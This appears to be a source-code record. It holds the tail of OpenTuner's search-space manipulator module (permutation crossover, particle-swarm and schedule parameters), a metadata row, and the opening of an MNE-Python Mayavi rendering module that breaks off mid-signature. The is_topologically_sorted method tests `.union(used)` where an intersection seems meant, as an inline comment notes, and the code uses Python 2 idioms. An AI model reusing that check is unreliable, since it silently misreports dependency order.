return [self.op1_flip]
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration randomly
:param config: the configuration to be changed
"""
self._set(config, self.seed_value())
def seed_value(self):
return random.choice((True, False))
def op1_flip(self, config):
"""
Flip this parameter's value in a configuration
:param config: the configuration to be changed
"""
self._set(config, not self._get(config))
def search_space_size(self):
return 2
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, *args, **kwargs):
"""
Simulates a single update step in particle swarm optimization by updating
the current position and returning a new velocity.
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1
The new current position is randomly chosen based on the new velocity
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best position
:param cfg2: a configuration to shift towards. Should be the global best position
:param c: the weight of the current velocity
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocity: the old velocity
:param args:
:param kwargs:
:return: the new velocity, a float
"""
v = velocity * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
# Map velocity to continuous space with sigmoid
s = 1 / (1 + numpy.exp(-v))
# Decide position randomly
p = (s - random.random()) > 0
self.set_value(cfg, p)
return v
class SwitchParameter(ComplexParameter):
"""
A parameter representing an unordered collection of options with no implied
correlation between the choices. The choices are range(option_count)
"""
def __init__(self, name, option_count):
self.option_count = option_count
super(SwitchParameter, self).__init__(name)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
self._set(config, random.randrange(self.option_count))
def seed_value(self):
return random.randrange(self.option_count)
def search_space_size(self):
return max(1, self.option_count)
class EnumParameter(ComplexParameter):
"""
same as a SwitchParameter but choices are taken from an arbitrarily typed list
"""
def __init__(self, name, options):
super(EnumParameter, self).__init__(name)
self.options = list(options)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
self._set(config, random.choice(self.options))
def seed_value(self):
return random.choice(self.options)
def search_space_size(self):
return max(1, len(self.options))
class PermutationParameter(ComplexParameter):
"""
A parameter representing a permutation (or ordering) as a list of items
"""
def __init__(self, name, items):
super(PermutationParameter, self).__init__(name)
self._items = list(items)
self.size = len(items)
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration to a random value
:param config: the configuration to be changed
"""
random.shuffle(self._get(config))
self.normalize(config)
def op1_small_random_change(self, config, p=0.25):
"""
Iterates through the list and probabilistically swaps each element with the
next element
:param p: probability of swapping an element with the next element
:param config: the configuration to be changed
"""
cfg_item = self._get(config)
for i in xrange(1, len(cfg_item)):
if random.random() < p:
# swap
cfg_item[i - 1], cfg_item[i] = cfg_item[i], cfg_item[i - 1]
self.normalize(config)
def seed_value(self):
return list(self._items) # copy
def manipulators(self, config):
return [self.op1_randomize, self.op1_small_random_change]
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
def search_space_size(self):
return math.factorial(max(1, len(self._items)))
def op3_cross(self, cfg, cfg1, cfg2, xchoice='op3_cross_OX1', strength=0.3,
*args, **kwargs):
"""
Calls the crossover operator specified by xchoice
Passes argument d = strength*(size of the permutation)
:param cfg: the configuration to be changed
:param cfg1: a parent configuration
:param cfg2: a parent configuration
:param xchoice: string specifying which crossover operator to use (should start with op3_cross prefix)
:param strength: the strength of the crossover
"""
dd = int(round(self.size * strength))
if dd < 1:
log.warning('Crossover length too small. Cannot create new solution.')
if dd >= self.size:
log.warning('Crossover length too big. Cannot create new solution.')
getattr(self, xchoice)(cfg, cfg1, cfg2, d=dd, *args, **kwargs)
def op3_swarm(self, cfg, cfg1, cfg2, xchoice='op3_cross_OX1', c=0.5,
c1=0.5, c2=0.5, strength=0.3, velocity=0, *args, **kwargs):
"""
Replacement for particle swarm optimization iterative step for permutations.
Given a target cfg and 2 parent cfgs, probabilistically performs an
op3_cross with one of the 2 parents.
:param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param xchoice: which crossover operator should be used
:param c: the probability of not performing a crossover
:param c1: the probability of performing a crossover with cfg1 (if a
crossover is performed)
:param c2: unused
:param strength: the strength of the crossover
:param velocity: the old velocity - unused
"""
if random.uniform(0, 1) > c:
if random.uniform(0, 1) < c1:
# Select crossover operator
self.op3_cross(cfg, cfg, cfg1, xchoice, strength)
else:
self.op3_cross(cfg, cfg, cfg2, xchoice, strength)
# swap-based operators
def op2_random_swap(self, cfg, cfg1, *args, **kwargs):
"""
Swap a random pair of items in cfg1 and save the result into cfg
:param cfg: the configuration to be changed
:param cfg1: the configuration whose PermutationParameter's elements are
swapped and copied into cfg
"""
p = self.get_value(cfg1)[:]
r = random.randint(0, len(p) - 1)
s = random.randint(0, len(p) - 1)
v1 = p[r]
v2 = p[s]
p[r] = v2
p[s] = v1
self.set_value(cfg, p)
def op2_random_invert(self, cfg, cfg1, strength=0.3, *args, **kwargs):
"""
Reverse the ordering of a random subsection of size d in cfg1 and save the
result in cfg where d = strength*total-size
:param cfg: the configuration to be changed
:param cfg1: the configuration whose PermutationParameter is inverted
:param strength: the size of the reversed subsection as a fraction of the
total size
"""
p = self.get_value(cfg1)[:]
d = int(round(len(p) * strength))
r = random.randint(0, len(p) - d)
subpath = p[r:r + d][:]
subpath.reverse()
p[r:r + d] = subpath
self.set_value(cfg, p)
# Crossover operators
def op3_cross_PX(self, cfg, cfg1, cfg2, d=0):
"""
Partition crossover (Whitley 2009?)
Chooses a random cut point and reorders elements in cfg1 up to the cut point
according to their order in cfg2.
Saves the result in cfg
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: unused
"""
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
c1 = random.randint(2, len(p1))
self.set_value(cfg, sorted(p1[:c1], key=lambda x: p2.index(x)) + p1[c1:])
def op3_cross_PMX(self, cfg, cfg1, cfg2, d=0):
"""
Partially-mapped crossover Goldberg & Lingle (1985)
Replaces a random section of cfg1 with the corresponding section in cfg2.
Displaced elements in cfg1 are moved to the old position of the elements
displacing them
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: the size of the crossover
"""
if d == 0:
d = max(1, int(round(self.size * 0.3))) # default to 1/3 of permutation size
p1 = self.get_value(cfg1)[:]
p2 = self.get_value(cfg2)[:]
r = random.randint(0, len(p1) - d)
c1 = p1[r:r + d]
c2 = p2[r:r + d]
# get new permutation by crossing over a section of p2 onto p1
pnew = self.get_value(cfg1)[:]
pnew[r:r + d] = c2
# fix conflicts by taking displaced elements in crossed over section
# displaced = (elements x in c1 where x does not have corresponding value in c2)
# and putting them where the value that displaced them was
#candidates for displacement
candidate_indices = set(range(r) + range(r+d, len(p1)))
# Check through displaced elements to find values to swap conflicts to
while c1 != []:
n = c1[0]
#try to match up a value in c1 to the equivalent value in c2
while c2[0] in c1:
if n == c2[0]:
# already match up
break
# find position idx of c2[0] in c1
link_idx = c1.index(c2[0])
# get value of c2 at idx
link = c2[link_idx]
# remove c2[idx] and c1[idx] since they match up when we swap c2[0] with c2[idx] (this avoids an infinite loop)
del c2[link_idx]
del c1[link_idx]
# swap new value into c2[0]
c2[0] = link
if n != c2[0]:
# first check if we can swap in the crossed over section still
if n in c2:
c2[c2.index(n)] = c2[0]
else:
# assign first instance of c2[0] outside of the crossed over section in pnew to c1[0]
for idx in candidate_indices:
if pnew[idx] == c2[0]:
pnew[idx] = c1[0]
candidate_indices.remove(idx) # make sure we don't override this value now
break
# remove first elements
del c1[0]
del c2[0]
self.set_value(cfg, pnew)
def op3_cross_CX(self, cfg, cfg1, cfg2, d=0):
"""
Implementation of a cyclic crossover.
Repeatedly replaces elements of cfg1 with the element at the same index in
cfg2. This is done until a cycle is reached and cfg1 is valid again. The
initial replacement is random.
Saves the result in cfg.
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: unused
"""
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
p = p1[:]
s = random.randint(0, len(p1) - 1)
i = s
indices = set()
while len(indices) < len(p1): # should never exceed this
indices.add(i)
val = p1[i]
i = p2.index(val)
# deal with duplicate values
while i in indices:
if i == s:
break
i = p2[i+1:].index(val) + i + 1
if i == s:
break
for j in indices:
p[j] = p2[j]
self.set_value(cfg, p)
def op3_cross_OX1(self, cfg, cfg1, cfg2, d=0):
"""
Ordered Crossover (Davis 1985)
Exchanges a subpath from cfg2 into cfg1 while maintaining the order of the
remaining elements in cfg1.
Saves the result in cfg.
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: size of the exchanged subpath
"""
if d == 0:
d = max(1, int(round(self.size * 0.3))) # default to 1/3 of permutation size
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
c1 = p1[:]
c2 = p2[:]
# Randomly find cut points
r = random.randint(0, len(
p1) - d) # Todo: treat path as circle i.e. allow cross-boundary cuts
[c1.remove(i) for i in p2[r:int(r + d)]]
self.set_value(cfg, c1[:r] + p2[r:r + d] + c1[r:])
def op3_cross_OX3(self, cfg, cfg1, cfg2, d=0):
"""
Ordered crossover variation 3 (Deep 2010)
Same as op3_cross_OX1, except the parents have different cut points for
their subpaths
:param cfg: the configuration to be changed
:param cfg1: the first parent configuration. The "base" configuration
:param cfg2: the second parent configuration. Is "crossed into" cfg1
:param d: size of the exchanged subpath
"""
if d == 0:
d = max(1, int(round(self.size * 0.3))) # default to 1/3 of permutation size
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
c1 = p1[:]
c2 = p2[:]
# Randomly find cut points
# Todo: treat path as circle i.e. allow cross-boundary cuts
r1 = random.randint(0, len(p1) - d)
r2 = random.randint(0, len(p1) - d)
[c1.remove(i) for i in p2[r2:r2 + d]]
self.set_value(cfg, c1[:r1] + p2[r2:r2 + d] + c1[r1:])
def search_space_size(self):
return math.factorial(max(1, len(self._items)))
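# Usage sketch (illustrative only, never called at import time): ordered
# crossover OX1 on a small permutation.  The parent orderings are made up.
def _example_permutation_cross():
  p = PermutationParameter('route', [0, 1, 2, 3, 4, 5])
  cfg1 = {'route': [0, 1, 2, 3, 4, 5]}
  cfg2 = {'route': [5, 4, 3, 2, 1, 0]}
  child = {'route': list(cfg1['route'])}
  p.op3_cross_OX1(child, cfg1, cfg2, d=2)  # splice a length-2 window of cfg2
  return child['route']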
class ScheduleParameter(PermutationParameter):
def __init__(self, name, items, deps):
super(ScheduleParameter, self).__init__(name, items)
self.deps = dict((k, set(v)) for k, v in deps.items())
log.debug("ScheduleParameter(%s, %s, %s)", repr(name), repr(items),
repr(deps))
self._expand_deps()
def _expand_deps(self):
"""expand self.deps to include recursive dependencies"""
fixed_point = False
while not fixed_point:
fixed_point = True
for k in self.deps.keys():
oldlen = len(self.deps[k])
for dep in list(self.deps[k]):
if dep in self.deps:
self.deps[k].update(self.deps[dep])
if oldlen != len(self.deps[k]):
fixed_point = False
# verify schedule is valid
items = set(self._items)
for k, v in self.deps.items():
if k in v:
raise Exception("ScheduleParameter('%s') cycle: %s depends on itself" %
(self.name, k))
if v - items:
raise Exception("ScheduleParameter('%s'): %s is unknown" %
(self.name, v - items))
if set(self.deps.keys()) - items:
raise Exception("ScheduleParameter('%s'): %s is unknown" %
(self.name, set(self.deps.keys()) - items))
def is_topologically_sorted(self, values):
used = set()
for v in values:
      # NOTE: .union(used) is truthy whenever v has any declared dependencies,
      # so any value with deps makes this return False and forces the full
      # re-sort in topologically_sorted(); an intersection or difference test
      # may have been intended here.
      if v in self.deps and self.deps[v].union(used):
return False
used.add(v)
return True
def topologically_sorted_depth_first(self, values):
"""faster but not stable enough"""
if self.is_topologically_sorted(values):
return values
sorted_values = []
used = set()
deps = dict((k, sorted(v, key=values.index, reverse=True))
for k, v in self.deps.items())
def visit(v):
if v in used:
return
if v in deps:
for dv in deps[v]:
visit(dv)
used.add(v)
sorted_values.append(v)
for v in reversed(values):
visit(v)
return list(reversed(sorted_values))
def topologically_sorted(self, values):
if self.is_topologically_sorted(values):
return values
deps = copy.deepcopy(self.deps)
queue = collections.deque(reversed(values))
sorted_values = []
while queue:
v = queue.popleft()
if v in deps and deps[v]:
queue.append(v)
else:
for k, d in deps.items():
d.discard(v)
if not d:
del deps[k]
sorted_values.append(v)
return list(reversed(sorted_values))
def normalize(self, cfg):
self._set(cfg, self.topologically_sorted(self._get(cfg)))
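# Usage sketch (illustrative only, never called at import time): hypothetical
# build steps where 'link' depends on 'compile' and 'package' depends on
# 'link'; normalize() rewrites the stored list into the canonical order
# produced by topologically_sorted() above.
def _example_schedule():
  p = ScheduleParameter('steps', ['compile', 'link', 'package'],
                        {'link': ['compile'], 'package': ['link']})
  cfg = {'steps': ['package', 'compile', 'link']}
  p.normalize(cfg)
  return cfg['steps']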
class SelectorParameter(ComplexParameter):
def __init__(self, name, choices, max_cutoff,
order_class=PermutationParameter,
offset_class=LogIntegerParameter):
super(SelectorParameter, self).__init__(name)
self.choices = choices
self.max_cutoff = max_cutoff
self.order_param = order_class('{0}/order'.format(name), choices)
self.offset_params = [
offset_class('{0}/offsets/{1}'.format(name, i), 0, max_cutoff)
for i in xrange(len(choices) - 1)]
def sub_parameters(self):
return [self.order_param] + self.offset_params
def seed_value(self):
return {'order': self.order_param.seed_value(),
'offsets': [co.seed_value() for co in self.offset_params]}
def op1_randomize(self, config):
random.choice(self.sub_parameters()).op1_randomize(config)
def selector_iter(self, config):
"""
yield (cutoff, choice) pairs
cutoff will be None on the first value
"""
order = config[self.name]['order']
yield (None, order[0])
cutoff = 0
for n, offset in enumerate(config[self.name]['offsets']):
if offset > 0:
cutoff += offset
yield cutoff, order[n + 1]
class ParameterArray(ComplexParameter):
"""
Represents an array of Parameters
"""
def __init__(self, name, count, element_type, *args, **kwargs):
super(ParameterArray, self).__init__(name)
self.count = count
self.sub_params = [
element_type('{0}/{1}'.format(name, i), *args[i], **kwargs[i])
for i in xrange(count)]
def sub_parameters(self):
return self.sub_params
def seed_value(self):
return [p.seed_value() for p in self.sub_params]
def op1_randomize(self, config):
"""
randomly selects a sub-parameter and randomizes it
:param config: the configuration to be changed
"""
random.choice(self.sub_parameters()).op1_randomize(config)
class BooleanParameterArray(ParameterArray):
"""
  Represents an array of BooleanParameters - currently unimplemented
"""
def __init__(self, name, count):
super(BooleanParameterArray, self).__init__(name, count, BooleanParameter)
def op3_swarm(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
def op3_cross(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
class IntegerParameterArray(ParameterArray):
"""
Represents an array of IntegerParameters - currently unimplemented
"""
def __init__(self, name, min_values, max_values):
assert len(min_values) == len(max_values)
super(IntegerParameterArray, self).__init__(name, len(min_values),
IntegerParameter,
min_value=min_values,
max_value=max_values)
def op3_swarm(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
def op3_cross(self, cfg, cfg1, cfg2, *args, **kwargs):
# TODO
pass
class Array(ComplexParameter):
"""
An interface for parameters representing an array of values.
"""
# TODO: constraints? (upper & lower bound etc)
def __init__(self, name, size):
super(Array, self).__init__(name)
self.size = size
def op3_cross(self, cfg, cfg1, cfg2, strength=0.3, *args, **kwargs):
"""
Crosses two arrays by replacing a random subsection of cfg1 with the
    corresponding subsection of cfg2. The size of the chunk is a fixed fraction
of the total length, given by the strength
Behaves like a specialized 2-point crossover, where the first cut point is
random and the second cut is a set distance after.
:param cfg: the configuration to be changed
:param cfg1: the configuration being inserted into
:param cfg2: the configuration being inserted
:param strength: the size of the crossover, as a fraction of total array
length
"""
d = int(round(self.size * strength))
if d < 1:
log.debug('Crossover length too small. Cannot create new solution.')
if d >= self.size:
log.debug('Crossover length too big. Cannot create new solution.')
p1 = self.get_value(cfg1)
p2 = self.get_value(cfg2)
r = random.randint(0, len(
p1) - d) # Todo: treat path as circle i.e. allow cross-boundary cuts
p = numpy.concatenate([p1[:r], p2[r:r + d], p1[r + d:]])
self.set_value(cfg, p)
def op3_swarm(self, cfg, cfg1, cfg2, c=1, c1=0.5,
c2=0.5, velocity=0, strength=0.3, *args, **kwargs):
"""
Replacement for a particle swarm optimization iterative step for arrays.
Given a target cfg and 2 parent cfgs, probabilistically performs an
:py:meth:`op3_cross` with one of the 2 parents.
    :param cfg: the configuration to be changed. Represents the current position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the probability of not performing a crossover
:param c1: the probability of performing a crossover with cfg1 (if a
crossover is performed)
:param c2: unused
:param velocity: the old velocity - unused
:param strength: the strength of the crossover
"""
if random.uniform(0, 1) > c:
if random.uniform(0, 1) < c1:
# Select crossover operator
self.op3_cross(cfg, cfg, cfg1, strength)
else:
self.op3_cross(cfg, cfg, cfg2, strength)
def get_value(self, config):
return self._get(config)
def set_value(self, config, value):
self._set(config, value)
class BooleanArray(Array):
"""
Represents an array of boolean values which are either 0 or 1
"""
def op3_swarm_parallel(self, cfg, cfg1, cfg2, c=1,
c1=0.5, c2=0.5, velocities=0):
"""
Simulates a single particle swarm optimization step for each element in the
array by updating each position and returning an array of new velocities.
The new velocities are given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1. In each iteration, r1 and
r2 are constant across array elements
The new cfg positions are randomly chosen based on the new velocities
:param cfg: the configuration to be changed. This represents the current
position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the weight of the current velocities
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocities: the current velocities
:return: a numpy array of new velocities
"""
vs = velocities * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
# Map velocity to continuous space with sigmoid
ss = 1 / (1 + numpy.exp(-vs))
# Decide position randomly
ps = (ss - numpy.random.rand(1, self.size)) > 0
self.set_value(cfg, ps)
return vs
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration randomly
:param config: the configuration to be changed
"""
value = numpy.random.rand(1, self.size) > 0.5
self._set(config, value)
def seed_value(self):
return numpy.random.rand(1, self.size) > 0.5
class FloatArray(Array):
"""
Represents an array of float values
"""
def __init__(self, name, size, fmax, fmin):
super(FloatArray, self).__init__(name, size)
self.fmax = fmax
self.fmin = fmin
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration randomly
:param config: the configuration to be changed
"""
value = numpy.random.rand(1, self.size) * (
self.fmax - self.fmin) + self.fmin
self._set(config, value)
def seed_value(self):
value = numpy.random.rand(1, self.size) * (
self.fmax - self.fmin) + self.fmin
return value
def op3_swarm_parallel(self, cfg, cfg1, cfg2, c=1,
c1=0.5, c2=0.5, velocities=0):
"""
Simulates a single particle swarm optimization step for each element in the
    array by updating each position and returning an array of new velocities
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1. In each iteration, r1 and
r2 are constant across array elements
The new cfg positions are randomly chosen based on the new velocities
:param cfg: the configuration to be changed. This represents the current
position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
    :param c: the weight of the current velocities
:param c1: weight of cfg1
:param c2: weight of cfg2
    :param velocities: the current velocities
:return: a numpy array of new velocities
"""
vs = velocities * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
p = self.get_value(cfg) + vs
p[p > self.fmax] = self.fmax
p[p < self.fmin] = self.fmin
self.set_value(cfg, p)
return vs
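# Usage sketch (illustrative only, never called at import time): an array of
# eight float "weights" in [-1, 1); the name and bounds are made up.
def _example_float_array():
  fa = FloatArray('weights', size=8, fmax=1.0, fmin=-1.0)
  cfg = {'weights': fa.seed_value()}  # 1x8 numpy array within the bounds
  fa.op1_randomize(cfg)               # draw a fresh random array in place
  return cfg['weights'].shape         # -> (1, 8)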
##################
class ManipulatorProxy(object):
"""
wrapper around configuration manipulator and config pair
"""
def __init__(self, manipulator, cfg):
self.cfg = cfg
self.manipulator = manipulator
self.params = manipulator.parameters_dict(self.cfg)
def keys(self):
return self.params.keys()
def __getitem__(self, k):
return ParameterProxy(self.params[k], self.cfg)
class ParameterProxy(object):
"""
  wrapper around a parameter and config pair, adds the config
  as the first argument to all method calls on the parameter
"""
def __init__(self, param, cfg):
self.cfg = cfg
self.param = param
def __getattr__(self, key):
"""equivalent of self.param.key(self.cfg, ...)"""
member = getattr(self.param, key)
def param_method_proxy(*args, **kwargs):
return member(self.cfg, *args, **kwargs)
if callable(member):
return param_method_proxy
else:
# we should only hit this for key == 'name'
return member
# Inspection Methods
def operators(param, num_parents):
"""
Return a list of operators for the given parameter that take the specified
number of input configurations
:param param: a Parameter class
:param num_parents: a String specifying number of inputs required by the operator.
should be one of '1', '2', '3', '4', or 'n'
"""
ops = []
methods = inspect.getmembers(param, inspect.ismethod)
for m in methods:
name, obj = m
if is_operator(name, num_parents):
ops.append(name)
return ops
def composable_operators(param, min_num_parents):
"""
  Return a list of operators for the given parameter that can be programmatically composed
  with a composable technique generating min_num_parents.
  Programmatically composable operators have no non-cfg arguments
:param param: a Parameter class
:param min_num_parents: the minimum number of parents passed to the operator
"""
if min_num_parents < 1:
return []
allowed_num_parents = ['n']
for i in range(1,5):
if i > min_num_parents:
break
allowed_num_parents.append(str(i))
ops = []
methods = inspect.getmembers(param, inspect.ismethod)
for m in methods:
name, obj = m
argspec = inspect.getargspec(obj)
numargs = len(argspec.args) - (len(argspec.defaults) if argspec.defaults else 0)
for num_parents in allowed_num_parents:
if is_operator(name, num_parents):
if num_parents == 'n':
if numargs == 3: # self, cfg, cfgs
ops.append(name)
else:
if numargs == (1 + int(num_parents)):
ops.append(name)
break
return ops
def is_operator(name, num_parents):
"""
Tells whether a method is an operator taking in the specified number of inputs
from the method name
:param name: the method name
:param num_parents: a String specifying number of inputs required by the operator.
should be one of '1', '2', '3', '4', or 'n'
"""
return ('op' + num_parents + '_') == name[:4]
def all_operators():
"""
Return a dictionary mapping from parameter names to lists of operator function
names
"""
ops = {}
for p in all_params():
name, obj = p
all_ops = []
for num in ['1', '2', '3', '4', 'n']:
all_ops += operators(obj, num)
ops[name] = all_ops
return ops
def all_params():
params = inspect.getmembers(sys.modules[__name__], lambda x: inspect.isclass(
x) and x.__module__ == __name__ and issubclass(x, Parameter))
return params
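# Usage sketch (illustrative only, never called at import time): the
# inspection helpers classify operators by the op<N>_ name prefix convention.
def _example_inspection():
  # e.g. ['op1_nop', 'op1_normal_mutation', 'op1_randomize', 'op1_scale']
  return operators(IntegerParameter, '1')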
|
Sierangho/opentuner
|
opentuner/search/manipulator.py
|
Python
|
mit
| 58,606
|
[
"Gaussian",
"VisIt"
] |
df218ddae6405046621df7b70cc405e934d7ad772284caf51af5838258c2f0aa
|
"""
Core visualization operations based on Mayavi.
Actual implementation of _Renderer and _Projection classes.
"""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
# Mark Wronkiewicz <wronk.mark@gmail.com>
# Joan Massich <mailsik@gmail.com>
# Guillaume Favelier <guillaume.favelier@gmail.com>
#
# License: Simplified BSD
from contextlib import contextmanager
import warnings
import numpy as np
from mayavi.core.scene import Scene
from mayavi.core.ui.mayavi_scene import MayaviScene
from tvtk.pyface.tvtk_scene import TVTKScene
from .base_renderer import _BaseRenderer
from ._utils import _check_color
from ...surface import _normalize_vectors
from ...utils import (_import_mlab, _validate_type, SilenceStdout,
copy_base_doc_to_subclass_doc)
class _Projection(object):
"""Class storing projection information.
Attributes
----------
xy : array
Result of 2d projection of 3d data.
pts : Source
Mayavi source handle.
"""
def __init__(self, xy=None, pts=None):
"""Store input projection information into attributes."""
self.xy = xy
self.pts = pts
def visible(self, state):
"""Modify visibility attribute of the source."""
if self.pts is not None:
self.pts.visible = state
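# Usage sketch (illustrative only): _Projection pairs the 2D projection of
# 3D data with the Mayavi source that produced it, so callers can toggle
# the glyphs, e.g.
#     proj = _Projection(xy=xy_coords, pts=points_source)
#     proj.visible(False)   # hide the projected points
# xy_coords and points_source are hypothetical placeholders.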
@copy_base_doc_to_subclass_doc
class _Renderer(_BaseRenderer):
"""Class managing rendering scene.
Attributes
----------
mlab: mayavi.mlab
Main Mayavi access point.
fig: mlab.Figure
Mayavi scene handle.
"""
def __init__(self, fig=None, size=(600, 600), bgcolor='black',
name=None, show=False, shape=(1, 1), smooth_shading=True):
if bgcolor is not None:
bgcolor = _check_color(bgcolor)
self.mlab = _import_mlab()
self.shape = shape
if fig is None:
self.fig = _mlab_figure(figure=name, bgcolor=bgcolor, size=size)
elif isinstance(fig, int):
self.fig = _mlab_figure(figure=fig, bgcolor=bgcolor, size=size)
else:
self.fig = fig
self.fig._window_size = size
_toggle_mlab_render(self.fig, show)
@property
def figure(self): # cross-compat w/PyVista
return self.fig
def subplot(self, x, y):
pass
def scene(self):
return self.fig
def set_interactive(self):
from tvtk.api import tvtk
if self.fig.scene is not None:
self.fig.scene.interactor.interactor_style = \
tvtk.InteractorStyleTerrain()
def mesh(self, x, y, z, triangles, color, opacity=1.0, shading=False,
backface_culling=False, scalars=None, colormap=None,
vmin=None, vmax=None, interpolate_before_map=True,
representation='surface', line_width=1., normals=None, **kwargs):
if color is not None:
color = _check_color(color)
if color is not None and isinstance(color, np.ndarray) \
and color.ndim > 1:
if color.shape[1] == 3:
vertex_color = np.c_[color, np.ones(len(color))] * 255.0
else:
vertex_color = color * 255.0
# create a lookup table to enable one color per vertex
scalars = np.arange(len(color))
color = None
else:
vertex_color = None
with warnings.catch_warnings(record=True): # traits
surface = self.mlab.triangular_mesh(x, y, z, triangles,
color=color,
scalars=scalars,
opacity=opacity,
figure=self.fig,
vmin=vmin,
vmax=vmax,
representation=representation,
line_width=line_width,
**kwargs)
l_m = surface.module_manager.scalar_lut_manager
if vertex_color is not None:
l_m.lut.table = vertex_color
elif isinstance(colormap, np.ndarray):
if colormap.dtype == np.uint8:
l_m.lut.table = colormap
elif colormap.dtype == np.float64:
l_m.load_lut_from_list(colormap)
else:
raise TypeError('Expected type for colormap values are'
' np.float64 or np.uint8: '
'{} was given'.format(colormap.dtype))
elif colormap is not None:
from matplotlib.cm import get_cmap
l_m.load_lut_from_list(
get_cmap(colormap)(np.linspace(0, 1, 256)))
surface.actor.property.shading = shading
surface.actor.property.backface_culling = backface_culling
return surface
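# Note on the per-vertex colour path above (example values are assumptions):
# an (n_verts, 3) RGB array, assumed to be in [0, 1], is padded with an alpha
# channel and scaled to 0-255 before being written into the LUT table, while
# scalars 0..n_verts-1 index each vertex into that table.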
def contour(self, surface, scalars, contours, width=1.0, opacity=1.0,
vmin=None, vmax=None, colormap=None,
normalized_colormap=False, kind='line', color=None):
mesh = _create_mesh_surf(surface, self.fig, scalars=scalars)
with warnings.catch_warnings(record=True): # traits
cont = self.mlab.pipeline.contour_surface(
mesh, contours=contours, line_width=width, vmin=vmin,
vmax=vmax, opacity=opacity, figure=self.fig)
cont.module_manager.scalar_lut_manager.lut.table = colormap
return cont
def surface(self, surface, color=None, opacity=1.0,
vmin=None, vmax=None, colormap=None,
normalized_colormap=False, scalars=None,
backface_culling=False):
if color is not None:
color = _check_color(color)
if normalized_colormap:
colormap = colormap * 255.0
# Make a solid surface
mesh = _create_mesh_surf(surface, self.fig, scalars=scalars)
with warnings.catch_warnings(record=True): # traits
surface = self.mlab.pipeline.surface(
mesh, color=color, opacity=opacity, vmin=vmin, vmax=vmax,
figure=self.fig)
if colormap is not None:
surface.module_manager.scalar_lut_manager.lut.table = colormap
surface.actor.property.backface_culling = backface_culling
def sphere(self, center, color, scale, opacity=1.0,
resolution=8, backface_culling=False,
radius=None):
color = _check_color(color)
center = np.atleast_2d(center)
x, y, z = center.T
surface = self.mlab.points3d(x, y, z, color=color,
resolution=resolution,
scale_factor=scale, opacity=opacity,
figure=self.fig)
surface.actor.property.backface_culling = backface_culling
def tube(self, origin, destination, radius=0.001, color='white',
scalars=None, vmin=None, vmax=None, colormap='RdBu',
normalized_colormap=False, reverse_lut=False):
color = _check_color(color)
origin = np.atleast_2d(origin)
destination = np.atleast_2d(destination)
if scalars is None:
# TODO: iterating over each tube rather than plotting in
# one call may be slow.
# See https://github.com/mne-tools/mne-python/issues/7644
for idx in range(origin.shape[0]):
surface = self.mlab.plot3d([origin[idx, 0],
destination[idx, 0]],
[origin[idx, 1],
destination[idx, 1]],
[origin[idx, 2],
destination[idx, 2]],
tube_radius=radius,
color=color,
figure=self.fig)
else:
for idx in range(origin.shape[0]):
surface = self.mlab.plot3d([origin[idx, 0],
destination[idx, 0]],
[origin[idx, 1],
destination[idx, 1]],
[origin[idx, 2],
destination[idx, 2]],
[scalars[idx, 0],
scalars[idx, 1]],
tube_radius=radius,
vmin=vmin,
vmax=vmax,
colormap=colormap,
figure=self.fig)
surface.module_manager.scalar_lut_manager.reverse_lut = reverse_lut
return surface
def quiver3d(self, x, y, z, u, v, w, color, scale, mode, resolution=8,
glyph_height=None, glyph_center=None, glyph_resolution=None,
